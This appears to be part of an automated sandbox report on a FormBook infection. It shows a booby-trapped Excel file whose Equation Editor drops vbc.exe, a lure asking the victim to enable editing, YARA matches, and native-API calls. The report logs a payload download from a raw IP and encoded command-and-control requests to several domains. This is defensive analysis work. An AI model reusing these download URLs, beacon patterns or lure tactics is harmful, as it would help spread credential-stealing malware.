Source: explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.492983646.00000000083C8000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29DF0F06.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.ahljsm.com
Source: global traffic HTTP traffic detected: GET /www1/deo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.197.254.181Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1Host: www.ahljsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.publicationsplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.upinmyfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1Host: www.lacucinadesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.restaurant-utopia.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: enable Editing and Cont&t from the Yellow bar 19 above to view locked content. 20 21 22 23 24
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00250198 4_2_00250198
Source: C:\Users\Public\vbc.exe Code function: 4_2_00250821 4_2_00250821
Source: C:\Users\Public\vbc.exe Code function: 4_2_002548B8 4_2_002548B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00254AF7 4_2_00254AF7
Source: C:\Users\Public\vbc.exe Code function: 4_2_00254B08 4_2_00254B08
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B9DA 5_2_0041B9DA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C2B0 5_2_0041C2B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C70 5_2_00408C70
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BC20 5_2_0041BC20
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C58D 5_2_0041C58D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BE92 5_2_0041BE92
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088E0C6 5_2_0088E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_008BD005 5_2_008BD005
Source: C:\Users\Public\vbc.exe Code function: 5_2_00893040 5_2_00893040
Source: C:\Users\Public\vbc.exe Code function: 5_2_008A905A 5_2_008A905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088E2E9 5_2_0088E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00931238 5_2_00931238
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088F3CF 5_2_0088F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_008B63DB 5_2_008B63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00892305 5_2_00892305
Source: C:\Users\Public\vbc.exe Code function: 5_2_00897353 5_2_00897353
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DA37B 5_2_008DA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_008A1489 5_2_008A1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_008C5485 5_2_008C5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_008AC5F0 5_2_008AC5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089351F 5_2_0089351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00894680 5_2_00894680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089E6C1 5_2_0089E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00932622 5_2_00932622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091579A 5_2_0091579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089C7BC 5_2_0089C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092F8EE 5_2_0092F8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089C85C 5_2_0089C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008B286D 5_2_008B286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093098E 5_2_0093098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_008929B2 5_2_008929B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_008A69FE 5_2_008A69FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00915955 5_2_00915955
Source: C:\Users\Public\vbc.exe Code function: 5_2_00943A83 5_2_00943A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093CBA4 5_2_0093CBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091DBDA 5_2_0091DBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0088FBD7 5_2_0088FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_008B7B00 5_2_008B7B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73B210 7_2_4A73B210
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A7412D2 7_2_4A7412D2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A73E46C 7_2_4A73E46C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_4A7439B6 7_2_4A7439B6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02401238 7_2_02401238
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0235E2E9 7_2_0235E2E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02362305 7_2_02362305
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023AA37B 7_2_023AA37B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02367353 7_2_02367353
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023863DB 7_2_023863DB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0235F3CF 7_2_0235F3CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0238D005 7_2_0238D005
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0237905A 7_2_0237905A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02363040 7_2_02363040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0235E0C6 7_2_0235E0C6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02402622 7_2_02402622
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02364680 7_2_02364680
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0236E6C1 7_2_0236E6C1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0236C7BC 7_2_0236C7BC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E579A 7_2_023E579A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02395485 7_2_02395485
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02371489 7_2_02371489
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0236351F 7_2_0236351F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0237C5F0 7_2_0237C5F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02413A83 7_2_02413A83
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02387B00 7_2_02387B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0235FBD7 7_2_0235FBD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0240CBA4 7_2_0240CBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023EDBDA 7_2_023EDBDA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0238286D 7_2_0238286D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0236C85C 7_2_0236C85C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023FF8EE 7_2_023FF8EE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023E5955 7_2_023E5955
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023629B2 7_2_023629B2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023769FE 7_2_023769FE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0240098E 7_2_0240098E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0237EE4C 7_2_0237EE4C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02370F3F 7_2_02370F3F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_02390D3B 7_2_02390D3B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0236CD5B 7_2_0236CD5B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_023FFDDD 7_2_023FFDDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009B9DA 7_2_0009B9DA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009C2B0 7_2_0009C2B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009BC20 7_2_0009BC20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00088C70 7_2_00088C70
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009C58D 7_2_0009C58D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00082D87 7_2_00082D87
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00082D90 7_2_00082D90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_0009BE92 7_2_0009BE92
Source: C:\Windows\SysWOW64\cmd.exe Code function: 7_2_00082FB0 7_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 008D3F92 appears 70 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008D373B appears 185 times
Source: C:\Users\Public\vbc.exe Code function: String function: 008FF970 appears 71 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0088E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0088DF5C appears 87 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0235E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 023A373B appears 237 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 023A3F92 appears 99 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 023CF970 appears 77 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0235DF5C appears 101 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185B0 NtCreateFile, 5_2_004185B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418660 NtReadFile, 5_2_00418660
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186E0 NtClose, 5_2_004186E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418790 NtAllocateVirtualMemory, 5_2_00418790
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185AA NtCreateFile, 5_2_004185AA
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186DA NtClose, 5_2_004186DA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041878A NtAllocateVirtualMemory, 5_2_0041878A
Source: C:\Users\Public\vbc.exe Code function: 5_2_008800C4 NtCreateFile,LdrInitializeThunk, 5_2_008800C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00880048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00880048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00880078 NtResumeThread,LdrInitializeThunk, 5_2_00880078
Source: C:\Users\Public\vbc.exe Code function: 5_2_008807AC NtCreateMutant,LdrInitializeThunk, 5_2_008807AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087F9F0 NtClose,LdrInitializeThunk, 5_2_0087F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087F900 NtReadFile,LdrInitializeThunk, 5_2_0087F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0087FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0087FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0087FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0087FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0087FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0087FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0087FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0087FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0087FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0087FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0087FFB4
